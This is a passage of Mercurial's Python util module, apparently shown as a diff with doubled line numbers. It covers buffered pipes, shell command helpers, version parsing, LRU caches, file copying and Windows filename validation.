282 281 When multiple digests are given, all of them are validated.
283 282 """
284 283
285 284 def __init__(self, fh, size, digests):
286 285 self._fh = fh
287 286 self._size = size
288 287 self._got = 0
289 288 self._digests = dict(digests)
290 289 self._digester = digester(self._digests.keys())
291 290
292 291 def read(self, length=-1):
293 292 content = self._fh.read(length)
294 293 self._digester.update(content)
295 294 self._got += len(content)
296 295 return content
297 296
298 297 def validate(self):
299 298 if self._size != self._got:
300 299 raise Abort(_('size mismatch: expected %d, got %d') %
301 300 (self._size, self._got))
302 301 for k, v in self._digests.items():
303 302 if v != self._digester[k]:
304 303 # i18n: first parameter is a digest name
305 304 raise Abort(_('%s mismatch: expected %s, got %s') %
306 305 (k, v, self._digester[k]))
307 306
308 307 try:
309 308 buffer = buffer
310 309 except NameError:
311 310 def buffer(sliceable, offset=0, length=None):
312 311 if length is not None:
313 312 return memoryview(sliceable)[offset:offset + length]
314 313 return memoryview(sliceable)[offset:]
315 314
316 315 closefds = pycompat.osname == 'posix'
317 316
318 317 _chunksize = 4096
319 318
320 319 class bufferedinputpipe(object):
321 320 """a manually buffered input pipe
322 321
323 322 Python will not let us use buffered IO and lazy reading with 'polling' at
324 323 the same time. We cannot probe the buffer state and select will not detect
325 324 that data are ready to read if they are already buffered.
326 325
327 326 This class let us work around that by implementing its own buffering
328 327 (allowing efficient readline) while offering a way to know if the buffer is
329 328 empty from the output (allowing collaboration of the buffer with polling).
330 329
331 330 This class lives in the 'util' module because it makes use of the 'os'
332 331 module from the python stdlib.
333 332 """
334 333
335 334 def __init__(self, input):
336 335 self._input = input
337 336 self._buffer = []
338 337 self._eof = False
339 338 self._lenbuf = 0
340 339
341 340 @property
342 341 def hasbuffer(self):
343 342 """True is any data is currently buffered
344 343
345 344 This will be used externally a pre-step for polling IO. If there is
346 345 already data then no polling should be set in place."""
347 346 return bool(self._buffer)
348 347
349 348 @property
350 349 def closed(self):
351 350 return self._input.closed
352 351
353 352 def fileno(self):
354 353 return self._input.fileno()
355 354
356 355 def close(self):
357 356 return self._input.close()
358 357
359 358 def read(self, size):
360 359 while (not self._eof) and (self._lenbuf < size):
361 360 self._fillbuffer()
362 361 return self._frombuffer(size)
363 362
364 363 def readline(self, *args, **kwargs):
365 364 if 1 < len(self._buffer):
366 365 # this should not happen because both read and readline end with a
367 366 # _frombuffer call that collapse it.
368 367 self._buffer = [''.join(self._buffer)]
369 368 self._lenbuf = len(self._buffer[0])
370 369 lfi = -1
371 370 if self._buffer:
372 371 lfi = self._buffer[-1].find('\n')
373 372 while (not self._eof) and lfi < 0:
374 373 self._fillbuffer()
375 374 if self._buffer:
376 375 lfi = self._buffer[-1].find('\n')
377 376 size = lfi + 1
378 377 if lfi < 0: # end of file
379 378 size = self._lenbuf
380 379 elif 1 < len(self._buffer):
381 380 # we need to take previous chunks into account
382 381 size += self._lenbuf - len(self._buffer[-1])
383 382 return self._frombuffer(size)
384 383
385 384 def _frombuffer(self, size):
386 385 """return at most 'size' data from the buffer
387 386
388 387 The data are removed from the buffer."""
389 388 if size == 0 or not self._buffer:
390 389 return ''
391 390 buf = self._buffer[0]
392 391 if 1 < len(self._buffer):
393 392 buf = ''.join(self._buffer)
394 393
395 394 data = buf[:size]
396 395 buf = buf[len(data):]
397 396 if buf:
398 397 self._buffer = [buf]
399 398 self._lenbuf = len(buf)
400 399 else:
401 400 self._buffer = []
402 401 self._lenbuf = 0
403 402 return data
404 403
405 404 def _fillbuffer(self):
406 405 """read data to the buffer"""
407 406 data = os.read(self._input.fileno(), _chunksize)
408 407 if not data:
409 408 self._eof = True
410 409 else:
411 410 self._lenbuf += len(data)
412 411 self._buffer.append(data)
413 412
414 413 def popen2(cmd, env=None, newlines=False):
415 414 # Setting bufsize to -1 lets the system decide the buffer size.
416 415 # The default for bufsize is 0, meaning unbuffered. This leads to
417 416 # poor performance on Mac OS X: http://bugs.python.org/issue4194
418 417 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
419 418 close_fds=closefds,
420 419 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
421 420 universal_newlines=newlines,
422 421 env=env)
423 422 return p.stdin, p.stdout
424 423
425 424 def popen3(cmd, env=None, newlines=False):
426 425 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
427 426 return stdin, stdout, stderr
428 427
429 428 def popen4(cmd, env=None, newlines=False, bufsize=-1):
430 429 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
431 430 close_fds=closefds,
432 431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
433 432 stderr=subprocess.PIPE,
434 433 universal_newlines=newlines,
435 434 env=env)
436 435 return p.stdin, p.stdout, p.stderr, p
437 436
438 437 def version():
439 438 """Return version information if available."""
440 439 try:
441 440 from . import __version__
442 441 return __version__.version
443 442 except ImportError:
444 443 return 'unknown'
445 444
446 445 def versiontuple(v=None, n=4):
447 446 """Parses a Mercurial version string into an N-tuple.
448 447
449 448 The version string to be parsed is specified with the ``v`` argument.
450 449 If it isn't defined, the current Mercurial version string will be parsed.
451 450
452 451 ``n`` can be 2, 3, or 4. Here is how some version strings map to
453 452 returned values:
454 453
455 454 >>> v = '3.6.1+190-df9b73d2d444'
456 455 >>> versiontuple(v, 2)
457 456 (3, 6)
458 457 >>> versiontuple(v, 3)
459 458 (3, 6, 1)
460 459 >>> versiontuple(v, 4)
461 460 (3, 6, 1, '190-df9b73d2d444')
462 461
463 462 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
464 463 (3, 6, 1, '190-df9b73d2d444+20151118')
465 464
466 465 >>> v = '3.6'
467 466 >>> versiontuple(v, 2)
468 467 (3, 6)
469 468 >>> versiontuple(v, 3)
470 469 (3, 6, None)
471 470 >>> versiontuple(v, 4)
472 471 (3, 6, None, None)
473 472
474 473 >>> v = '3.9-rc'
475 474 >>> versiontuple(v, 2)
476 475 (3, 9)
477 476 >>> versiontuple(v, 3)
478 477 (3, 9, None)
479 478 >>> versiontuple(v, 4)
480 479 (3, 9, None, 'rc')
481 480
482 481 >>> v = '3.9-rc+2-02a8fea4289b'
483 482 >>> versiontuple(v, 2)
484 483 (3, 9)
485 484 >>> versiontuple(v, 3)
486 485 (3, 9, None)
487 486 >>> versiontuple(v, 4)
488 487 (3, 9, None, 'rc+2-02a8fea4289b')
489 488 """
490 489 if not v:
491 490 v = version()
492 491 parts = remod.split('[\+-]', v, 1)
493 492 if len(parts) == 1:
494 493 vparts, extra = parts[0], None
495 494 else:
496 495 vparts, extra = parts
497 496
498 497 vints = []
499 498 for i in vparts.split('.'):
500 499 try:
501 500 vints.append(int(i))
502 501 except ValueError:
503 502 break
504 503 # (3, 6) -> (3, 6, None)
505 504 while len(vints) < 3:
506 505 vints.append(None)
507 506
508 507 if n == 2:
509 508 return (vints[0], vints[1])
510 509 if n == 3:
511 510 return (vints[0], vints[1], vints[2])
512 511 if n == 4:
513 512 return (vints[0], vints[1], vints[2], extra)
514 513
515 514 # used by parsedate
516 515 defaultdateformats = (
517 516 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
518 517 '%Y-%m-%dT%H:%M', # without seconds
519 518 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
520 519 '%Y-%m-%dT%H%M', # without seconds
521 520 '%Y-%m-%d %H:%M:%S', # our common legal variant
522 521 '%Y-%m-%d %H:%M', # without seconds
523 522 '%Y-%m-%d %H%M%S', # without :
524 523 '%Y-%m-%d %H%M', # without seconds
525 524 '%Y-%m-%d %I:%M:%S%p',
526 525 '%Y-%m-%d %H:%M',
527 526 '%Y-%m-%d %I:%M%p',
528 527 '%Y-%m-%d',
529 528 '%m-%d',
530 529 '%m/%d',
531 530 '%m/%d/%y',
532 531 '%m/%d/%Y',
533 532 '%a %b %d %H:%M:%S %Y',
534 533 '%a %b %d %I:%M:%S%p %Y',
535 534 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
536 535 '%b %d %H:%M:%S %Y',
537 536 '%b %d %I:%M:%S%p %Y',
538 537 '%b %d %H:%M:%S',
539 538 '%b %d %I:%M:%S%p',
540 539 '%b %d %H:%M',
541 540 '%b %d %I:%M%p',
542 541 '%b %d %Y',
543 542 '%b %d',
544 543 '%H:%M:%S',
545 544 '%I:%M:%S%p',
546 545 '%H:%M',
547 546 '%I:%M%p',
548 547 )
549 548
550 549 extendeddateformats = defaultdateformats + (
551 550 "%Y",
552 551 "%Y-%m",
553 552 "%b",
554 553 "%b %Y",
555 554 )
556 555
557 556 def cachefunc(func):
558 557 '''cache the result of function calls'''
559 558 # XXX doesn't handle keywords args
560 559 if func.__code__.co_argcount == 0:
561 560 cache = []
562 561 def f():
563 562 if len(cache) == 0:
564 563 cache.append(func())
565 564 return cache[0]
566 565 return f
567 566 cache = {}
568 567 if func.__code__.co_argcount == 1:
569 568 # we gain a small amount of time because
570 569 # we don't need to pack/unpack the list
571 570 def f(arg):
572 571 if arg not in cache:
573 572 cache[arg] = func(arg)
574 573 return cache[arg]
575 574 else:
576 575 def f(*args):
577 576 if args not in cache:
578 577 cache[args] = func(*args)
579 578 return cache[args]
580 579
581 580 return f
582 581
583 582 class sortdict(collections.OrderedDict):
584 583 '''a simple sorted dictionary
585 584
586 585 >>> d1 = sortdict([('a', 0), ('b', 1)])
587 586 >>> d2 = d1.copy()
588 587 >>> d2
589 588 sortdict([('a', 0), ('b', 1)])
590 589 >>> d2.update([('a', 2)])
591 590 >>> d2.keys() # should still be in last-set order
592 591 ['b', 'a']
593 592 '''
594 593
595 594 def __setitem__(self, key, value):
596 595 if key in self:
597 596 del self[key]
598 597 super(sortdict, self).__setitem__(key, value)
599 598
600 599 if pycompat.ispypy:
601 600 # __setitem__() isn't called as of PyPy 5.8.0
602 601 def update(self, src):
603 602 if isinstance(src, dict):
604 603 src = src.iteritems()
605 604 for k, v in src:
606 605 self[k] = v
607 606
608 607 class transactional(object):
609 608 """Base class for making a transactional type into a context manager."""
610 609 __metaclass__ = abc.ABCMeta
611 610
612 611 @abc.abstractmethod
613 612 def close(self):
614 613 """Successfully closes the transaction."""
615 614
616 615 @abc.abstractmethod
617 616 def release(self):
618 617 """Marks the end of the transaction.
619 618
620 619 If the transaction has not been closed, it will be aborted.
621 620 """
622 621
623 622 def __enter__(self):
624 623 return self
625 624
626 625 def __exit__(self, exc_type, exc_val, exc_tb):
627 626 try:
628 627 if exc_type is None:
629 628 self.close()
630 629 finally:
631 630 self.release()
632 631
633 632 @contextlib.contextmanager
634 633 def acceptintervention(tr=None):
635 634 """A context manager that closes the transaction on InterventionRequired
636 635
637 636 If no transaction was provided, this simply runs the body and returns
638 637 """
639 638 if not tr:
640 639 yield
641 640 return
642 641 try:
643 642 yield
644 643 tr.close()
645 644 except error.InterventionRequired:
646 645 tr.close()
647 646 raise
648 647 finally:
649 648 tr.release()
650 649
651 650 @contextlib.contextmanager
652 651 def nullcontextmanager():
653 652 yield
654 653
655 654 class _lrucachenode(object):
656 655 """A node in a doubly linked list.
657 656
658 657 Holds a reference to nodes on either side as well as a key-value
659 658 pair for the dictionary entry.
660 659 """
661 660 __slots__ = (u'next', u'prev', u'key', u'value')
662 661
663 662 def __init__(self):
664 663 self.next = None
665 664 self.prev = None
666 665
667 666 self.key = _notset
668 667 self.value = None
669 668
670 669 def markempty(self):
671 670 """Mark the node as emptied."""
672 671 self.key = _notset
673 672
674 673 class lrucachedict(object):
675 674 """Dict that caches most recent accesses and sets.
676 675
677 676 The dict consists of an actual backing dict - indexed by original
678 677 key - and a doubly linked circular list defining the order of entries in
679 678 the cache.
680 679
681 680 The head node is the newest entry in the cache. If the cache is full,
682 681 we recycle head.prev and make it the new head. Cache accesses result in
683 682 the node being moved to before the existing head and being marked as the
684 683 new head node.
685 684 """
686 685 def __init__(self, max):
687 686 self._cache = {}
688 687
689 688 self._head = head = _lrucachenode()
690 689 head.prev = head
691 690 head.next = head
692 691 self._size = 1
693 692 self._capacity = max
694 693
695 694 def __len__(self):
696 695 return len(self._cache)
697 696
698 697 def __contains__(self, k):
699 698 return k in self._cache
700 699
701 700 def __iter__(self):
702 701 # We don't have to iterate in cache order, but why not.
703 702 n = self._head
704 703 for i in range(len(self._cache)):
705 704 yield n.key
706 705 n = n.next
707 706
708 707 def __getitem__(self, k):
709 708 node = self._cache[k]
710 709 self._movetohead(node)
711 710 return node.value
712 711
713 712 def __setitem__(self, k, v):
714 713 node = self._cache.get(k)
715 714 # Replace existing value and mark as newest.
716 715 if node is not None:
717 716 node.value = v
718 717 self._movetohead(node)
719 718 return
720 719
721 720 if self._size < self._capacity:
722 721 node = self._addcapacity()
723 722 else:
724 723 # Grab the last/oldest item.
725 724 node = self._head.prev
726 725
727 726 # At capacity. Kill the old entry.
728 727 if node.key is not _notset:
729 728 del self._cache[node.key]
730 729
731 730 node.key = k
732 731 node.value = v
733 732 self._cache[k] = node
734 733 # And mark it as newest entry. No need to adjust order since it
735 734 # is already self._head.prev.
736 735 self._head = node
737 736
738 737 def __delitem__(self, k):
739 738 node = self._cache.pop(k)
740 739 node.markempty()
741 740
742 741 # Temporarily mark as newest item before re-adjusting head to make
743 742 # this node the oldest item.
744 743 self._movetohead(node)
745 744 self._head = node.next
746 745
747 746 # Additional dict methods.
748 747
749 748 def get(self, k, default=None):
750 749 try:
751 750 return self._cache[k].value
752 751 except KeyError:
753 752 return default
754 753
755 754 def clear(self):
756 755 n = self._head
757 756 while n.key is not _notset:
758 757 n.markempty()
759 758 n = n.next
760 759
761 760 self._cache.clear()
762 761
763 762 def copy(self):
764 763 result = lrucachedict(self._capacity)
765 764 n = self._head.prev
766 765 # Iterate in oldest-to-newest order, so the copy has the right ordering
767 766 for i in range(len(self._cache)):
768 767 result[n.key] = n.value
769 768 n = n.prev
770 769 return result
771 770
772 771 def _movetohead(self, node):
773 772 """Mark a node as the newest, making it the new head.
774 773
775 774 When a node is accessed, it becomes the freshest entry in the LRU
776 775 list, which is denoted by self._head.
777 776
778 777 Visually, let's make ``N`` the new head node (* denotes head):
779 778
780 779 previous/oldest <-> head <-> next/next newest
781 780
782 781 ----<->--- A* ---<->-----
783 782 | |
784 783 E <-> D <-> N <-> C <-> B
785 784
786 785 To:
787 786
788 787 ----<->--- N* ---<->-----
789 788 | |
790 789 E <-> D <-> C <-> B <-> A
791 790
792 791 This requires the following moves:
793 792
794 793 C.next = D (node.prev.next = node.next)
795 794 D.prev = C (node.next.prev = node.prev)
796 795 E.next = N (head.prev.next = node)
797 796 N.prev = E (node.prev = head.prev)
798 797 N.next = A (node.next = head)
799 798 A.prev = N (head.prev = node)
800 799 """
801 800 head = self._head
802 801 # C.next = D
803 802 node.prev.next = node.next
804 803 # D.prev = C
805 804 node.next.prev = node.prev
806 805 # N.prev = E
807 806 node.prev = head.prev
808 807 # N.next = A
809 808 # It is tempting to do just "head" here, however if node is
810 809 # adjacent to head, this will do bad things.
811 810 node.next = head.prev.next
812 811 # E.next = N
813 812 node.next.prev = node
814 813 # A.prev = N
815 814 node.prev.next = node
816 815
817 816 self._head = node
818 817
819 818 def _addcapacity(self):
820 819 """Add a node to the circular linked list.
821 820
822 821 The new node is inserted before the head node.
823 822 """
824 823 head = self._head
825 824 node = _lrucachenode()
826 825 head.prev.next = node
827 826 node.prev = head.prev
828 827 node.next = head
829 828 head.prev = node
830 829 self._size += 1
831 830 return node
832 831
833 832 def lrucachefunc(func):
834 833 '''cache most recent results of function calls'''
835 834 cache = {}
836 835 order = collections.deque()
837 836 if func.__code__.co_argcount == 1:
838 837 def f(arg):
839 838 if arg not in cache:
840 839 if len(cache) > 20:
841 840 del cache[order.popleft()]
842 841 cache[arg] = func(arg)
843 842 else:
844 843 order.remove(arg)
845 844 order.append(arg)
846 845 return cache[arg]
847 846 else:
848 847 def f(*args):
849 848 if args not in cache:
850 849 if len(cache) > 20:
851 850 del cache[order.popleft()]
852 851 cache[args] = func(*args)
853 852 else:
854 853 order.remove(args)
855 854 order.append(args)
856 855 return cache[args]
857 856
858 857 return f
859 858
860 859 class propertycache(object):
861 860 def __init__(self, func):
862 861 self.func = func
863 862 self.name = func.__name__
864 863 def __get__(self, obj, type=None):
865 864 result = self.func(obj)
866 865 self.cachevalue(obj, result)
867 866 return result
868 867
869 868 def cachevalue(self, obj, value):
870 869 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
871 870 obj.__dict__[self.name] = value
872 871
873 872 def pipefilter(s, cmd):
874 873 '''filter string S through command CMD, returning its output'''
875 874 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
876 875 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
877 876 pout, perr = p.communicate(s)
878 877 return pout
879 878
880 879 def tempfilter(s, cmd):
881 880 '''filter string S through a pair of temporary files with CMD.
882 881 CMD is used as a template to create the real command to be run,
883 882 with the strings INFILE and OUTFILE replaced by the real names of
884 883 the temporary files generated.'''
885 884 inname, outname = None, None
886 885 try:
887 886 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
888 887 fp = os.fdopen(infd, pycompat.sysstr('wb'))
889 888 fp.write(s)
890 889 fp.close()
891 890 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
892 891 os.close(outfd)
893 892 cmd = cmd.replace('INFILE', inname)
894 893 cmd = cmd.replace('OUTFILE', outname)
895 894 code = os.system(cmd)
896 895 if pycompat.sysplatform == 'OpenVMS' and code & 1:
897 896 code = 0
898 897 if code:
899 898 raise Abort(_("command '%s' failed: %s") %
900 899 (cmd, explainexit(code)))
901 900 return readfile(outname)
902 901 finally:
903 902 try:
904 903 if inname:
905 904 os.unlink(inname)
906 905 except OSError:
907 906 pass
908 907 try:
909 908 if outname:
910 909 os.unlink(outname)
911 910 except OSError:
912 911 pass
913 912
914 913 filtertable = {
915 914 'tempfile:': tempfilter,
916 915 'pipe:': pipefilter,
917 916 }
918 917
919 918 def filter(s, cmd):
920 919 "filter a string through a command that transforms its input to its output"
921 920 for name, fn in filtertable.iteritems():
922 921 if cmd.startswith(name):
923 922 return fn(s, cmd[len(name):].lstrip())
924 923 return pipefilter(s, cmd)
925 924
926 925 def binary(s):
927 926 """return true if a string is binary data"""
928 927 return bool(s and '\0' in s)
929 928
930 929 def increasingchunks(source, min=1024, max=65536):
931 930 '''return no less than min bytes per chunk while data remains,
932 931 doubling min after each chunk until it reaches max'''
933 932 def log2(x):
934 933 if not x:
935 934 return 0
936 935 i = 0
937 936 while x:
938 937 x >>= 1
939 938 i += 1
940 939 return i - 1
941 940
942 941 buf = []
943 942 blen = 0
944 943 for chunk in source:
945 944 buf.append(chunk)
946 945 blen += len(chunk)
947 946 if blen >= min:
948 947 if min < max:
949 948 min = min << 1
950 949 nmin = 1 << log2(blen)
951 950 if nmin > min:
952 951 min = nmin
953 952 if min > max:
954 953 min = max
955 954 yield ''.join(buf)
956 955 blen = 0
957 956 buf = []
958 957 if buf:
959 958 yield ''.join(buf)
960 959
961 960 Abort = error.Abort
962 961
963 962 def always(fn):
964 963 return True
965 964
966 965 def never(fn):
967 966 return False
968 967
969 968 def nogc(func):
970 969 """disable garbage collector
971 970
972 971 Python's garbage collector triggers a GC each time a certain number of
973 972 container objects (the number being defined by gc.get_threshold()) are
974 973 allocated even when marked not to be tracked by the collector. Tracking has
975 974 no effect on when GCs are triggered, only on what objects the GC looks
976 975 into. As a workaround, disable GC while building complex (huge)
977 976 containers.
978 977
979 978 This garbage collector issue have been fixed in 2.7. But it still affect
980 979 CPython's performance.
981 980 """
982 981 def wrapper(*args, **kwargs):
983 982 gcenabled = gc.isenabled()
984 983 gc.disable()
985 984 try:
986 985 return func(*args, **kwargs)
987 986 finally:
988 987 if gcenabled:
989 988 gc.enable()
990 989 return wrapper
991 990
992 991 if pycompat.ispypy:
993 992 # PyPy runs slower with gc disabled
994 993 nogc = lambda x: x
995 994
996 995 def pathto(root, n1, n2):
997 996 '''return the relative path from one place to another.
998 997 root should use os.sep to separate directories
999 998 n1 should use os.sep to separate directories
1000 999 n2 should use "/" to separate directories
1001 1000 returns an os.sep-separated path.
1002 1001
1003 1002 If n1 is a relative path, it's assumed it's
1004 1003 relative to root.
1005 1004 n2 should always be relative to root.
1006 1005 '''
1007 1006 if not n1:
1008 1007 return localpath(n2)
1009 1008 if os.path.isabs(n1):
1010 1009 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1011 1010 return os.path.join(root, localpath(n2))
1012 1011 n2 = '/'.join((pconvert(root), n2))
1013 1012 a, b = splitpath(n1), n2.split('/')
1014 1013 a.reverse()
1015 1014 b.reverse()
1016 1015 while a and b and a[-1] == b[-1]:
1017 1016 a.pop()
1018 1017 b.pop()
1019 1018 b.reverse()
1020 1019 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1021 1020
1022 1021 def mainfrozen():
1023 1022 """return True if we are a frozen executable.
1024 1023
1025 1024 The code supports py2exe (most common, Windows only) and tools/freeze
1026 1025 (portable, not much used).
1027 1026 """
1028 1027 return (safehasattr(sys, "frozen") or # new py2exe
1029 1028 safehasattr(sys, "importers") or # old py2exe
1030 1029 imp.is_frozen(u"__main__")) # tools/freeze
1031 1030
1032 1031 # the location of data files matching the source code
1033 1032 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1034 1033 # executable version (py2exe) doesn't support __file__
1035 1034 datapath = os.path.dirname(pycompat.sysexecutable)
1036 1035 else:
1037 1036 datapath = os.path.dirname(pycompat.fsencode(__file__))
1038 1037
1039 1038 i18n.setdatapath(datapath)
1040 1039
1041 1040 _hgexecutable = None
1042 1041
1043 1042 def hgexecutable():
1044 1043 """return location of the 'hg' executable.
1045 1044
1046 1045 Defaults to $HG or 'hg' in the search path.
1047 1046 """
1048 1047 if _hgexecutable is None:
1049 1048 hg = encoding.environ.get('HG')
1050 1049 mainmod = sys.modules[pycompat.sysstr('__main__')]
1051 1050 if hg:
1052 1051 _sethgexecutable(hg)
1053 1052 elif mainfrozen():
1054 1053 if getattr(sys, 'frozen', None) == 'macosx_app':
1055 1054 # Env variable set by py2app
1056 1055 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1057 1056 else:
1058 1057 _sethgexecutable(pycompat.sysexecutable)
1059 1058 elif (os.path.basename(
1060 1059 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1061 1060 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1062 1061 else:
1063 1062 exe = findexe('hg') or os.path.basename(sys.argv[0])
1064 1063 _sethgexecutable(exe)
1065 1064 return _hgexecutable
1066 1065
1067 1066 def _sethgexecutable(path):
1068 1067 """set location of the 'hg' executable"""
1069 1068 global _hgexecutable
1070 1069 _hgexecutable = path
1071 1070
1072 1071 def _isstdout(f):
1073 1072 fileno = getattr(f, 'fileno', None)
1074 1073 return fileno and fileno() == sys.__stdout__.fileno()
1075 1074
1076 1075 def shellenviron(environ=None):
1077 1076 """return environ with optional override, useful for shelling out"""
1078 1077 def py2shell(val):
1079 1078 'convert python object into string that is useful to shell'
1080 1079 if val is None or val is False:
1081 1080 return '0'
1082 1081 if val is True:
1083 1082 return '1'
1084 1083 return str(val)
1085 1084 env = dict(encoding.environ)
1086 1085 if environ:
1087 1086 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1088 1087 env['HG'] = hgexecutable()
1089 1088 return env
1090 1089
1091 1090 def system(cmd, environ=None, cwd=None, out=None):
1092 1091 '''enhanced shell command execution.
1093 1092 run with environment maybe modified, maybe in different dir.
1094 1093
1095 1094 if out is specified, it is assumed to be a file-like object that has a
1096 1095 write() method. stdout and stderr will be redirected to out.'''
1097 1096 try:
1098 1097 stdout.flush()
1099 1098 except Exception:
1100 1099 pass
1101 1100 cmd = quotecommand(cmd)
1102 1101 env = shellenviron(environ)
1103 1102 if out is None or _isstdout(out):
1104 1103 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1105 1104 env=env, cwd=cwd)
1106 1105 else:
1107 1106 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1108 1107 env=env, cwd=cwd, stdout=subprocess.PIPE,
1109 1108 stderr=subprocess.STDOUT)
1110 1109 for line in iter(proc.stdout.readline, ''):
1111 1110 out.write(line)
1112 1111 proc.wait()
1113 1112 rc = proc.returncode
1114 1113 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1115 1114 rc = 0
1116 1115 return rc
1117 1116
1118 1117 def checksignature(func):
1119 1118 '''wrap a function with code to check for calling errors'''
1120 1119 def check(*args, **kwargs):
1121 1120 try:
1122 1121 return func(*args, **kwargs)
1123 1122 except TypeError:
1124 1123 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1125 1124 raise error.SignatureError
1126 1125 raise
1127 1126
1128 1127 return check
1129 1128
1130 1129 # a whilelist of known filesystems where hardlink works reliably
1131 1130 _hardlinkfswhitelist = {
1132 1131 'btrfs',
1133 1132 'ext2',
1134 1133 'ext3',
1135 1134 'ext4',
1136 1135 'hfs',
1137 1136 'jfs',
1138 1137 'reiserfs',
1139 1138 'tmpfs',
1140 1139 'ufs',
1141 1140 'xfs',
1142 1141 'zfs',
1143 1142 }
1144 1143
1145 1144 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1146 1145 '''copy a file, preserving mode and optionally other stat info like
1147 1146 atime/mtime
1148 1147
1149 1148 checkambig argument is used with filestat, and is useful only if
1150 1149 destination file is guarded by any lock (e.g. repo.lock or
1151 1150 repo.wlock).
1152 1151
1153 1152 copystat and checkambig should be exclusive.
1154 1153 '''
1155 1154 assert not (copystat and checkambig)
1156 1155 oldstat = None
1157 1156 if os.path.lexists(dest):
1158 1157 if checkambig:
1159 1158 oldstat = checkambig and filestat.frompath(dest)
1160 1159 unlink(dest)
1161 1160 if hardlink:
1162 1161 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1163 1162 # unless we are confident that dest is on a whitelisted filesystem.
1164 1163 try:
1165 1164 fstype = getfstype(os.path.dirname(dest))
1166 1165 except OSError:
1167 1166 fstype = None
1168 1167 if fstype not in _hardlinkfswhitelist:
1169 1168 hardlink = False
1170 1169 if hardlink:
1171 1170 try:
1172 1171 oslink(src, dest)
1173 1172 return
1174 1173 except (IOError, OSError):
1175 1174 pass # fall back to normal copy
1176 1175 if os.path.islink(src):
1177 1176 os.symlink(os.readlink(src), dest)
1178 1177 # copytime is ignored for symlinks, but in general copytime isn't needed
1179 1178 # for them anyway
1180 1179 else:
1181 1180 try:
1182 1181 shutil.copyfile(src, dest)
1183 1182 if copystat:
1184 1183 # copystat also copies mode
1185 1184 shutil.copystat(src, dest)
1186 1185 else:
1187 1186 shutil.copymode(src, dest)
1188 1187 if oldstat and oldstat.stat:
1189 1188 newstat = filestat.frompath(dest)
1190 1189 if newstat.isambig(oldstat):
1191 1190 # stat of copied file is ambiguous to original one
1192 1191 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1193 1192 os.utime(dest, (advanced, advanced))
1194 1193 except shutil.Error as inst:
1195 1194 raise Abort(str(inst))
1196 1195
1197 1196 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1198 1197 """Copy a directory tree using hardlinks if possible."""
1199 1198 num = 0
1200 1199
1201 1200 gettopic = lambda: hardlink and _('linking') or _('copying')
1202 1201
1203 1202 if os.path.isdir(src):
1204 1203 if hardlink is None:
1205 1204 hardlink = (os.stat(src).st_dev ==
1206 1205 os.stat(os.path.dirname(dst)).st_dev)
1207 1206 topic = gettopic()
1208 1207 os.mkdir(dst)
1209 1208 for name, kind in listdir(src):
1210 1209 srcname = os.path.join(src, name)
1211 1210 dstname = os.path.join(dst, name)
1212 1211 def nprog(t, pos):
1213 1212 if pos is not None:
1214 1213 return progress(t, pos + num)
1215 1214 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1216 1215 num += n
1217 1216 else:
1218 1217 if hardlink is None:
1219 1218 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1220 1219 os.stat(os.path.dirname(dst)).st_dev)
1221 1220 topic = gettopic()
1222 1221
1223 1222 if hardlink:
1224 1223 try:
1225 1224 oslink(src, dst)
1226 1225 except (IOError, OSError):
1227 1226 hardlink = False
1228 1227 shutil.copy(src, dst)
1229 1228 else:
1230 1229 shutil.copy(src, dst)
1231 1230 num += 1
1232 1231 progress(topic, num)
1233 1232 progress(topic, None)
1234 1233
1235 1234 return hardlink, num
1236 1235
1237 1236 _winreservednames = b'''con prn aux nul
1238 1237 com1 com2 com3 com4 com5 com6 com7 com8 com9
1239 1238 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1240 1239 _winreservedchars = ':*?"<>|'
1241 1240 def checkwinfilename(path):
1242 1241 r'''Check that the base-relative path is a valid filename on Windows.
1243 1242 Returns None if the path is ok, or a UI string describing the problem.
1244 1243
1245 1244 >>> checkwinfilename("just/a/normal/path")
1246 1245 >>> checkwinfilename("foo/bar/con.xml")
1247 1246 "filename contains 'con', which is reserved on Windows"
1248 1247 >>> checkwinfilename("foo/con.xml/bar")
1249 1248 "filename contains 'con', which is reserved on Windows"
1250 1249 >>> checkwinfilename("foo/bar/xml.con")
1251 1250 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1252 1251 "filename contains 'AUX', which is reserved on Windows"
1253 1252 >>> checkwinfilename("foo/bar/bla:.txt")
1254 1253 "filename contains ':', which is reserved on Windows"
1255 1254 >>> checkwinfilename("foo/bar/b\07la.txt")
1256 1255 "filename contains '\\x07', which is invalid on Windows"
1257 1256 >>> checkwinfilename("foo/bar/bla ")
1258 1257 "filename ends with ' ', which is not allowed on Windows"
1259 1258 >>> checkwinfilename("../bar")
1260 1259 >>> checkwinfilename("foo\\")
1261 1260 "filename ends with '\\', which is invalid on Windows"
1262 1261 >>> checkwinfilename("foo\\/bar")
